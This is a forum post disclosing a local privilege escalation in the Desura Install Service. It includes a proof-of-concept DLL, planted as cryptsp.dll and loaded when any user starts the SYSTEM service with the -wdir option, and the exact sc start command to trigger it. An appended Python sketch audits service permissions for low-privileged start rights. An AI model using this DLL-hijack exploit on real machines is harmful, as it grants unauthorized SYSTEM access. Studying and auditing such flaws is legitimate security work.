ZenHAX
http://zenhax.com/

Desura Install Service privilege escalation
http://zenhax.com/viewtopic.php?f=16&t=81

Author:  aluigi [ Fri Aug 15, 2014 7:33 pm ]
Post subject:  Desura Install Service privilege escalation

The following was a quick test I made back in October 2012, and it's still working.

"Desura is a digital distribution platform developed by Linden Research":
http://www.desura.com

Basically it's a competitor of Steam that, as I remember, was mainly focused on indie games and was then bought by Linden, the guys behind Second Life.

Anyway, it's just a local privilege escalation to become SYSTEM by using an option of the installer service; not so important, but interesting to show.

Compile a DLL with the name cryptsp.dll; the following is a quick example DLL for testing whether you are able to write in a folder that requires Administrator privileges:
Code:
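#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
    if(ulReason == DLL_PROCESS_ATTACH) {
        /* c:\windows is writable only with Administrator privileges,
           so the file appearing shows the DLL ran in a privileged process */
        system("echo HELLO > c:\\windows\\poc.txt");
        Sleep(INFINITE);    /* block forever */
    }
    return TRUE;
}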


Create an empty folder called bin and put the dll there.

Kill/close the Desura client if it's running.

Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:
Code:
sc start "Desura Install Service" -wdir z:\poc


That's all.

Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp

If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf
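
The post depends on any user being able to start a SYSTEM service and pass it arguments. As an added example (not from the original post or the Desura code base), this Python sketch parses the SDDL string printed by `sc sdshow <service>` and lists the low-privileged principals that an allow ACE lets start the service. Both SDDL strings are constructed samples, not Desura's actual descriptor.

```python
import re

# SDDL SID aliases for principals that include ordinary, non-admin users.
LOW_PRIV = {"WD": "Everyone", "AU": "Authenticated Users", "IU": "Interactive",
            "BU": "Builtin Users", "BG": "Builtin Guests", "AN": "Anonymous"}
GRANTS_START = {"RP", "GA", "GX"}   # RP is SERVICE_START; GA/GX include it
# Same rights as a hex mask: SERVICE_START | GENERIC_ALL | GENERIC_EXECUTE
START_BITS = 0x0010 | 0x10000000 | 0x20000000


def dacl_aces(sddl):
    """Yield (ace_type, rights, sid) for each ACE in the D: section only."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    for body in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        f = body.split(";")   # type;flags;rights;obj_guid;inherit_guid;sid
        if len(f) >= 6:
            yield f[0], f[2], f[5]


def allows_start(rights):
    """True if an ACE rights field (two-letter codes or hex) grants start."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & START_BITS)
    return bool(GRANTS_START & set(re.findall("..", rights)))


def who_can_start(sddl):
    """Low-privileged principals granted start by an allow ACE.
    Deny ACEs and ACE ordering are not modelled."""
    return sorted({LOW_PRIV[sid] for t, rights, sid in dacl_aces(sddl)
                   if t == "A" and sid in LOW_PRIV and allows_start(rights)})


# Constructed sample: only SYSTEM and Administrators may start the service.
# The S: (audit) section names WD but must not be read as a grant.
RESTRICTED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
              "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
              "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed sample: start right handed to non-admin principals.
PERMISSIVE = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
              "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWRPLOCRRC;;;AU)(A;;0x10;;;IU)")

if __name__ == "__main__":
    for name, sddl in (("restricted", RESTRICTED), ("permissive", PERMISSIVE)):
        print(name, "->", who_can_start(sddl) or "no low-privileged starters")
```

A non-empty result is only a problem when the service also acts on caller-supplied start arguments, as with the -wdir option above.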
